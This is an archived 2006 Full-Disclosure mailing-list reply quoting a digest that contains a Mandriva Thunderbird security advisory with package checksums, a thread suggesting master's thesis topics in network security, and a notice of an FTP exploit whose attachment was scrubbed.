>corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  _______________________________________________________________________
>
>  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
>  of md5 checksums and GPG signatures is performed automatically for you.
>
>  All packages are signed by Mandriva for security.  You can obtain the
>  GPG public key of the Mandriva Security Team by executing:
>
>   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
>  You can view other update advisories for Mandriva Linux at:
>
>   http://www.mandriva.com/security/advisories
>
>  If you want to report vulnerabilities, please contact
>
>   security_(at)_mandriva.com
>  _______________________________________________________________________
>
>  Type Bits/KeyID     Date       User ID
>  pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>   
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2.2 (GNU/Linux)
>
>iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
>75x+jP9FNzlE7ieAV3r7Czs=
>=DdKu
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 4
>Date: Fri, 15 Dec 2006 17:01:50 -0600 (CST)
>From: scott hollatz 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: Fajar Edisya Putera 
>Cc: full-disclosure at lists.grok.org.uk
>Message-ID: 
>Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
> > Hello everyone, sorry for wasting your bandwidth
> >
> > I'm currently trying to find an interesting topic in computer networking
> > security for my master degree thesis, I've read a lot of jurnal that 
>related
> > with computer networking and security. All journal seem to advanced for 
>me,
> > sometimes the journal has mathematical formula that I don't understand 
>what
> > is the point for. Maybe someone here willing to help me? an idea? or 
>another
> > journal website?
>
>Networking and security *is* mathematical, don't be fooled.
>
>A quick peek at "ACM Transactions on Information and System Security"
>and "IEEE/ACM Transactions on Networking" should be a hint you need to
>understand math to do a relatively decent masters thesis.
>
>- --
>scott hollatz                                        net shollatz at d.UMn.eDu
>information technology systems and services          tel +1 218 726 8851
>university of minnesota duluth mn usa                fax +1 218 726 7674
>                                                                           
>--
>                                                "Asn aD ta zlAp em uT 
>zt33rg"
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.6 (SunOS)
>
>iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
>ZuitIDA2auiGOhFPl9xUFfw=
>=ILTE
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 5
>Date: Fri, 15 Dec 2006 23:30:19 +0000
>From: xyberpix 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: scott hollatz 
>Cc: full-disclosure at lists.grok.org.uk
>Message-ID: <6ACC9203-E28C-42D8-8783-CB77D24417A9 at xyberpix.com>
>Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>What about hacking ATM's, that'd make a great thesis from my side.
>Also what about in-depth research into botnets?
>
>xyberpix
>
>On 15 Dec 2006, at 23:01, scott hollatz wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> >> Hello everyone, sorry for wasting your bandwidth
> >>
> >> I'm currently trying to find an interesting topic in computer
> >> networking
> >> security for my master degree thesis, I've read a lot of jurnal
> >> that related
> >> with computer networking and security. All journal seem to
> >> advanced for me,
> >> sometimes the journal has mathematical formula that I don't
> >> understand what
> >> is the point for. Maybe someone here willing to help me? an idea?
> >> or another
> >> journal website?
> >
> > Networking and security *is* mathematical, don't be fooled.
> >
> > A quick peek at "ACM Transactions on Information and System Security"
> > and "IEEE/ACM Transactions on Networking" should be a hint you need to
> > understand math to do a relatively decent masters thesis.
> >
> > - --
> > scott hollatz                                        net
> > shollatz at d.UMn.eDu
> > information technology systems and services          tel +1 218 726
> > 8851
> > university of minnesota duluth mn usa                fax +1 218 726
> > 7674
> >
> >     --
> >                                                "Asn aD ta zlAp em
> > uT zt33rg"
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.6 (SunOS)
> >
> > iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
> > ZuitIDA2auiGOhFPl9xUFfw=
> > =ILTE
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.5 (Darwin)
>
>iD8DBQFFgzAMt+Si58vRtJARAqpBAKCfgFJVAmrKNKqf0v0prg2YbupjfACgo1g1
>hylhuBgjFPhJ0QYXoS1XMXs=
>=DWHp
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 6
>Date: Fri, 15 Dec 2006 16:16:50 -0800
>From: "Bill Stout" 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: 
>Message-ID:
>	<1FA45C2E5F2E4B46967415DA3A804FE88125D9 at mail.greenborder.com>
>Content-Type: text/plain; charset="us-ascii"
>
>Here are a few ideas:
>
>
>
>- The threat of rogue Virtual machines - the inside man
>
>- Disassembling Vista Security
>
>- Investigating organized computer crime
>
>- The mythical network perimeter
>
>- Data flow analysis of confidential information within corporations
>
>- Distribution and access of personal data
>
>
>
>Just suggestions, but your thesis should be of a topic which is a
>passion for you and holds your interest.  Your thesis topic may affect
>your next few years of employment, so invest in something that will be
>around for awhile (don't write about a technology approaching end of
>life).
>
>
>
>Bill Stout
>
>
>
>________________________________
>
>From: full-disclosure-bounces at lists.grok.org.uk
>[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Fajar
>Edisya Putera
>Sent: Friday, December 15, 2006 1:45 AM
>To: full-disclosure at lists.grok.org.uk
>Subject: [Full-disclosure] [OOT] Thesis for master degree
>
>
>
>Hello everyone, sorry for wasting your bandwidth
>
>I'm currently trying to find an interesting topic in computer networking
>security for my master degree thesis, I've read a lot of jurnal that
>related with computer networking and security. All journal seem to
>advanced for me, sometimes the journal has mathematical formula that I
>don't understand what is the point for. Maybe someone here willing to
>help me? an idea? or another journal website?
>
>Thanks
>Sincerely yours
>Fajar
>
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL: 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/fa897403/attachment-0001.html
>
>------------------------------
>
>Message: 7
>Date: Sat, 16 Dec 2006 05:27:13 +0100
>From: "kcope" 
>Subject: [Full-disclosure] ftpd ld.so.preload fun
>To: full-disclosure at lists.grok.org.uk
>Message-ID: <20061216042713.235360 at gmx.net>
>Content-Type: text/plain; charset="iso-8859-1"
>
>Hello this is kingcope,
>attached is an example exploit
>
>
>--
>"Ein Herz f?r Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
>Unser Dankesch?n: Ihr Name auf dem Segel der 1. deutschen America's 
>Cup-Yacht!
>-------------- next part --------------
>A non-text attachment was scrubbed...
>Name: ftpd-ldpreload.pl
>Type: application/octet-stream
>Size: 2733 bytes
>Desc: not available
>Url : 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061216/91666f7f/attachment-0001.obj
>
>------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>End of Full-Disclosure Digest, Vol 22, Issue 27
>***********************************************

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/



From gigiyousef at hotmail.com  Sun Dec 17 05:29:11 2006
From: gigiyousef at hotmail.com (badr muhyeddin)
Date: Sun, 17 Dec 2006 07:29:11 +0200
Subject: [Full-disclosure] Full-Disclosure Digest, Vol 22, Issue 27
In-Reply-To: 
Message-ID: 

please,dont send me any other messages regarding the same subject


>From: full-disclosure-request at lists.grok.org.uk
>Reply-To: full-disclosure at lists.grok.org.uk
>To: full-disclosure at lists.grok.org.uk
>Subject: Full-Disclosure Digest, Vol 22, Issue 27
>Date: Sat, 16 Dec 2006 12:00:02 +0000
>
>Send Full-Disclosure mailing list submissions to
>	full-disclosure at lists.grok.org.uk
>
>To subscribe or unsubscribe via the World Wide Web, visit
>	https://lists.grok.org.uk/mailman/listinfo/full-disclosure
>or, via email, send a message with subject or body 'help' to
>	full-disclosure-request at lists.grok.org.uk
>
>You can reach the person managing the list at
>	full-disclosure-owner at lists.grok.org.uk
>
>When replying, please edit your Subject line so it is more specific
>than "Re: Contents of Full-Disclosure digest..."
>
>
>Note to digest recipients - when replying to digest posts, please trim your 
>post appropriately. Thank you.
>
>
>Today's Topics:
>
>    1. [ MDKSA-2006:206 ] - Updated Thunderbird packages	fix
>       multiple vulnerabilities (security at mandriva.com)
>    2. [OOT] Thesis for master degree (Fajar Edisya Putera)
>    3. [ MDKSA-2006:206 ] - Updated Thunderbird packages	fix
>       multiple vulnerabilities (security at mandriva.com)
>    4. Re: [OOT] Thesis for master degree (scott hollatz)
>    5. Re: [OOT] Thesis for master degree (xyberpix)
>    6. Re: [OOT] Thesis for master degree (Bill Stout)
>    7. ftpd ld.so.preload fun (kcope)
>
>
>----------------------------------------------------------------------
>
>Message: 1
>Date: Fri, 15 Dec 2006 14:36:00 -0700
>From: security at mandriva.com
>Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird
>	packages	fix multiple vulnerabilities
>To: full-disclosure at lists.grok.org.uk
>Message-ID: 
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>  _______________________________________________________________________
>
>  Mandriva Linux Security Advisory                         MDKSA-2006:206
>  http://www.mandriva.com/security/
>  _______________________________________________________________________
>
>  Package : mozilla-thunderbird
>  Date    : November 9, 2006
>  Affected: 2007.0, Corporate 3.0
>  _______________________________________________________________________
>
>  Problem Description:
>
>  A number of security vulnerabilities have been discovered and corrected
>  in the latest Mozilla Thunderbird program, version 1.5.0.8.
>
>  This update provides the latest Thunderbird to correct these issues.
>  _______________________________________________________________________
>
>  References:
>
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
>  http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
>  _______________________________________________________________________
>
>  Updated Packages:
>
>  Mandriva Linux 2007.0:
>  488e65dfe45ecf7e3a9e1a3dedd5c2ce  
>2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
>  5e551ab45061148722dda1d7ce66959e  
>2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2149a7fd629b8bc6843c6fdf1bb49efb  
>2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0d2315b490e3b8dd2ab791bd6c3ee516  
>2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d5583d1b99b948c90e1cad62d753d67d  
>2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
>  00ec607c39d3de4c589997d6c7ee6679  
>2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6d1f0f2576362a0bb90b4f9d8c4f2153  
>2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2cb0e44d2e3f7fddd60249843204403f  
>2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0c3c771882698d5651775aeed24bfd73  
>2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
>  477ca905391c1d555d0136d46d557869  
>2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  741811dd392d942b27e1b3b0de695d4e  
>2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7c2c4922c6a2c6ce2cb6108a95f7dbfa  
>2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7cbf9f3218d587ef97edf01f2298096b  
>2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7dbd9e4c16db82a761a7b502c1f7f22d  
>2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b6dd6119216f6b748ee7c1570c3b8c37  
>2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1eea732e08ca0ef96796c3f50abb1f77  
>2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1cc5cf2496581d776bb43e2f0dbbea6  
>2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  af86ce82ff9053250f82f2215c8dd7e5  
>2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6319633c561c7f68c6614685126da02b  
>2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56387829c6cc83882246e68e3b8704b0  
>2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56cb838bb0c375f53d3cff2eb76a1118  
>2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  253500598ff56ab85394e68708ace21d  
>2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  53b4d4f1aa4e8174a33a0ed436ce961a  
>2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fb9dd6933d27029538cd01a64ec55cee  
>2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  701b9837303a3ed79e6c74c037c28926  
>2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b3739c1344770e92864c50f131f08884  
>2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1efe7ebc2a71e2f2d6c2785026a6e7ac  
>2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6860352b37999652aab785a266673e2f  
>2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  51abe323b14793097935b0c221e64f71  
>2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b8ec884437a460c9fbb5c71db6a46c31  
>2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  9ae4fb1871ee29f3f7b52210c0cf4e1b  
>2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1a31b03ffef8e86df09579296fce3c9  
>2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6b4bdbb4648231b128655e56015621c7  
>2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d333252ee1ba51351762e4050565ecb1  
>2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0a2828dbab70a2be0e721cc016f93d7f  
>2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  defa2ac291c66f693946362bd2501c40  
>2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c5540aa8289eefbf3e708e442de77aa8  
>2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  45da9968c4661ef994ef1dcefd0ad54f  
>2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
>  df8d2ea1013a65457aa1f2100060d968  
>2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  f87f2441b2ca36d4f5c3f3f2dd04b3bb  
>2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  bc3a281fbc5c09b7f962dfb1d3b9e517  
>2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2563050985477697472069d08e96de0f  
>2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e22be985ae58ab3eba5b90aa6a3eb58e  
>2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fde0d1b9c4feee3c1e239345f4065090  
>2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  10be2386887a6c70bc4f9c0453b33072  
>2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1c92d5ee79fc52ec1525f3c96dfa1916  
>2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  42e6ddb4a33a297c71b996bf651a4d69  
>2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  96394d1245284a886b954bb063c0ab5b  
>2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  8386317130e064260bd8b114616410ed  
>2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  eb622e8adc0767e090a608e80a1611b7  
>2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3ca6736aaf725851a0be21f0490aeb20  
>2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  47b16b8c45acc936b62051594ed87c69  
>2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c2e742162882c52761040025ff4ddfff  
>2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  072c5224bd49a45ba7ab0a57f657ec6e  
>2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3393e810730d305adc4fe8ecc98b782a  
>2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  70882501b0fc01a56cee67c2b7c63ac5  
>2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Mandriva Linux 2007.0/X86_64:
>  47aa8c7af46ee44f1b51e0f44772beeb  
>2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e284b46733e04ab96cccb612de04e5a8  
>2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e73efd093c48aa82d6f73025f1ade443  
>2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ed790bdd1a45343b427925765f5f2b5c  
>2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  61690a97ef04b6083693ffe4a9ab3176  
>2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  889574eda89385739aad6eda7f3d2604  
>2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ef9b59cdd619da74737b5e91e4067386  
>2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e20a88ece32f8ee81aaedd828558d880  
>2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  250f6f86984922da278774d480ba37a7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f683dba38c9055cbac36f8468e357ebf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6594d0bb3f7770f168728827c1cf9f83  
>2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1ee011c3c94c7b081f53b9a55996da0c  
>2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be24dd32e628b8294c1b87d200cf02dd  
>2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  020acf8e510080a701c6278c6eb862ae  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  af4c92e4f3eaf833111572ead14c8c04  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7483c3a55198fcbc9be2c9750919a370  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  753acdb58e6400659dab48ff78f371e7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  fb83f542bd12edda5e85d9873a08a938  
>2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  996bbfb13654cfc2180036ea6b1e61df  
>2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ff6217b99ab96a1444b6a758bf184ecf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f15d9f053011068deba71fdc05dc6d46  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  98f63b0dedef781ec16f8bebb6a032cb  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e5e42bb849d26a4f59fb6204d6ed9850  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8bc9d56d4778baf40b115eb805a506b3  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  21c7d7ffd14a724e4ce9d96e99d0f3c7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9b115831c8ae36d7141c93a9d867d445  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  d6efb3cdaba13c17dd31147011796614  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4239765036a0bffaa4fcff9fb076a221  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be87cc456600cb0dc18730ae3f75af92  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  459367e42865a1de4374d2a9b8c36232  
>2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e1b30720806b2c6ab650251f9756127  
>2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  70c5525bea63d291374706abfb4523c4  
>2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4addf81f6fdb0fe55d2274ba726d066e  
>2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9c9a1e6a7623a712f40666e77fd3f2b4  
>2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9cd9d0509bbe4d0bc7c092118253c237  
>2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  b23236fc11caa38b1354893f1e9863e1  
>2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c5b898d7f04c26a34bb4223ee4547586  
>2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8e114fec014131d472790035a1509783  
>2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  3eda3b36a83c550a1f52faf6adfb0b10  
>2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c336cc525567465d1649ee55c604d3a3  
>2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  476f974ea2e3b9ef971231b8b08e62f0  
>2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7878332de8134b9025b924315d6ffbf6  
>2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7602f9099c26d60e934f54918dd38e46  
>2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  52ba4b91175db4376fd4c4e9018969c3  
>2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e2bc31ee83c5c47f06953aba976a27d  
>2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  47b180beb65802e89f7e6a8be7f33d15  
>2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6485a71b5d07fef3e337630aa53bb4c6  
>2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6b5df9cad533fc75fc47191df5f3dabf  
>2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99b61d660a72eff639f78ec0422aeaf2  
>2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99cfe247978fe85b5b5186bf12247f3a  
>2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8c393629997cea717c2f1e8d077a9344  
>2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be518e4b4833e6cb9d083871101be35b  
>2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8dedff0ffd0e7b7721b256f01821f188  
>2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  05202d61506a60981fb9a317ce6a5d5d  
>2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0deda88ec857fb0c11b57555814a20ec  
>2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0f2f7928b2edfbe0ae5faf127b0ed066  
>2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Corporate 3.0:
